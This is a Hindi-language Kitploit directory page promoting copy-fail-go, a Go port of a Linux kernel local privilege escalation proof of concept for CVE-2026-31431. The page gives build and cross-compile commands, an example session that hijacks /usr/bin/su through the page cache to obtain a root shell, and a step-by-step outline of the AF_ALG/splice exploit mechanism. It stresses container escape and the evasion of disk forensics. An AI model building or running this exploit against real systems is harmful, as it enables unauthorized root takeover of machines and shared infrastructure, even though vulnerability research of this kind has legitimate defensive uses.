Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
copy-fail-go — Go port of the CVE-2026-31431 (copy-fail) Linux kernel privilege escalation PoC, with automatic SUID binary enumeration and interactive target selection. | Kitploit
उपकरण/GitHubGitHub/3jee/copy-fail-go
विशेषाधिकार वृद्धिशोषण फ्रेमवर्कभेद्यता विश्लेषणशोषणCTFपेनिट्रेशन टेस्टिंगरेड टीमिंगबाइनरी शोषण
GitHub3jee/copy-fail-go

copy-fail-go

Go port of the CVE-2026-31431 (copy-fail) Linux kernel privilege escalation PoC, with automatic SUID binary enumeration and interactive target selection.

रिपॉजिटरी देखें
13 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

copy-fail-go

grenkoca के Python PoC का Go पोर्ट CVE-2026-31431 (copy-fail) के लिए।

यह संस्करण पूरी तरह से स्टैटिक बाइनरी में कंपाइल होता है जिसमें शून्य रनटाइम निर्भरताएँ हैं - न Python, न pip, न libc संस्करण की बाधाएँ। इसे किसी भी Linux टारगेट पर डालें और चलाएँ। यह टारगेट पर सभी SUID वर्ल्ड-रीडेबल बाइनरीज़ को स्वचालित रूप से एन्यूमरेट भी करता है और आपको चुनने देता है कि किसका इंटरैक्टिव रूप से शोषण करना है।

केवल अधिकृत सुरक्षा अनुसंधान और CTF उपयोग के लिए।


CVE-2026-31431 (copy-fail) क्या है?

Theori द्वारा खोजा गया और 29 अप्रैल, 2026 को सार्वजनिक रूप से प्रकट किया गया, Copy.Fail Linux कर्नेल के algif_aead क्रिप्टो मॉड्यूल में एक लॉजिक दोष है जो 2017 के ऑप्टिमाइज़ेशन के माध्यम से पेश किया गया था। यह 2017 से हर मुख्यधारा Linux वितरण को प्रभावित करता है।

कर्नेल के AF_ALG क्रिप्टो इंटरफ़ेस में हेरफेर करके, एक अनप्रिविलेज्ड हमलावर नियंत्रित डेटा सीधे Linux पेज कैश में लिख सकता है - विश्वसनीय सिस्टम बाइनरीज़ का इन-मेमोरी प्रतिनिधित्व। यह /usr/bin/su जैसी बाइनरीज़ को डिस्क पर फ़ाइल को संशोधित किए बिना अस्थायी रूप से हाईजैक करने की अनुमति देता है, जिससे डिस्क-आधारित फोरेंसिक हमले के प्रति अंधा हो जाता है।

कई LPE दोषों के विपरीत जो रेस कंडीशन या कर्नेल एड्रेस लीक पर निर्भर करते हैं, Copy.Fail अत्यधिक विश्वसनीय है और केवल एक मानक उपयोगकर्ता खाते के साथ लगातार काम करता है।

प्रभाव:

  • सामान्य उपयोगकर्ता → किसी भी प्रभावित सिस्टम पर root
  • कंटेनर से होस्ट तक भागना
  • CI/CD जॉब अपने रनर को रूट करता है
  • साझा/मल्टी-टेनेंट इंफ्रास्ट्रक्चर टेनेंट्स के बीच समझौता
  • डिस्क पर कोई फ़ाइल संशोधन नहीं (अखंडता जाँच से बचता है)

प्रभावित कर्नेल: 2017 से हर वितरण। विशिष्ट संस्करण सीमा के लिए grenkoca का मूल PoC देखें।


मूल Python PoC से अंतर


आवश्यकताएँ

  • प्रभावित संस्करण सीमा में Linux कर्नेल
  • टारगेट पर एक SUID वर्ल्ड-रीडेबल बाइनरी मौजूद (टूल उन्हें ढूंढ लेगा)
  • चलाने के लिए कोई विशेष विशेषाधिकार आवश्यक नहीं

बिल्ड निर्भरताएँ (आपकी बिल्ड मशीन पर)

टूलसंस्करण
Go1.21+

बिल्डिंग

नेटिव Linux बिल्ड

root@kitploit:~
git clone https://github.com/3jee/copy-fail-go
cd copy-fail-go
go build -o copy-fail .

macOS या Windows से क्रॉस-कंपाइल (Linux x86-64 को लक्षित करते हुए)

root@kitploit:~
GOOS=linux GOARCH=amd64 CGO_ENABLED=0 go build -ldflags="-s -w" -o copy-fail .

-s -w फ्लैग बाइनरी आकार कम करने के लिए डीबग जानकारी हटाते हैं। CGO_ENABLED=0 बिना libc निर्भरता के पूरी तरह से स्टैटिक बाइनरी बनाता है - glibc संस्करण की परवाह किए बिना इसे किसी भी Linux टारगेट पर डालें।

अन्य आर्किटेक्चर

टारगेटकमांड
Linux ARM64GOOS=linux GOARCH=arm64 CGO_ENABLED=0 go build -o copy-fail .
Linux 32-bit x86GOOS=linux GOARCH=386 CGO_ENABLED=0 go build -o copy-fail .

उपयोग

बाइनरी को टारगेट पर ट्रांसफर करें और इसे निष्पादित करें (root आवश्यक नहीं):

root@kitploit:~
./copy-fail

उदाहरण सत्र:

root@kitploit:~
CVE-2026-31431 (copy-fail) - Go PoC
Based on grenkoca's original PoC

Scanning for SUID world-readable binaries...

SUID world-readable binaries found:
------------------------------------
  [1] /usr/bin/su
  [2] /usr/bin/sudo
  [3] /usr/bin/passwd
  [4] /usr/bin/newgrp

Select target [1-4]: 1

[*] Targeting: /usr/bin/su
[*] Writing 48 bytes to /usr/bin/su...
[+] Write complete. Executing target...
# whoami
root

यह कैसे काम करता है

  1. टारगेट SUID बाइनरी को O_RDONLY के साथ खोलता है - कोई राइट अनुमति आवश्यक नहीं।
  2. authencesn(hmac(sha256),cbc(aes)) AEAD ट्रांसफॉर्म से बंधा एक AF_ALG (SOCK_SEQPACKET) सॉकेट बनाता है।
  3. टारगेट फ़ाइल के पेज कैश एंट्री के विरुद्ध क्रिप्टो ऑपरेशन को क्यू करने के लिए MSG_MORE और SOL_ALG कंट्रोल संदेशों के साथ एक क्राफ्टेड sendmsg भेजता है।
  4. फ़ाइल से ALG सॉकेट में पेज ले जाने के लिए splice(2) का उपयोग करता है, जो कमजोर कर्नेल पथ को ट्रिगर करता है जो फ़ाइल अनुमतियों की दोबारा जाँच किए बिना संशोधित पेज कैश पेज वापस लिखता है।
  5. पेलोड के प्रत्येक 4-बाइट चंक के लिए दोहराता है।
  6. पैच की गई बाइनरी को निष्पादित करता है।

क्रेडिट

  • grenkoca - मूल Python PoC
  • Theori - भेद्यता खोज
  • यह रिपो स्वचालित टारगेट एन्यूमरेशन के साथ एक अनमिनिफाइड Go पोर्ट है

संदर्भ

  • OVHcloud: Copy.Fail - How to Rapidly Protect MKS Clusters from the Linux Kernel Zero-Day
  • grenkoca का मूल Python PoC (gist)
टूल डाउनलोड करें
मूल (Python)यह रिपो (Go)
भाषाPython 3Go 1.21+
टारगेटहार्डकोडेड /usr/bin/suलाइव फाइलसिस्टम स्कैन से स्वचालित रूप से पता लगाया गया
टारगेट चयनकोई नहींइंटरैक्टिव नंबरित मेनू
वितरणस्क्रिप्टएकल स्टैटिक बाइनरी (कोई रनटाइम निर्भरता नहीं)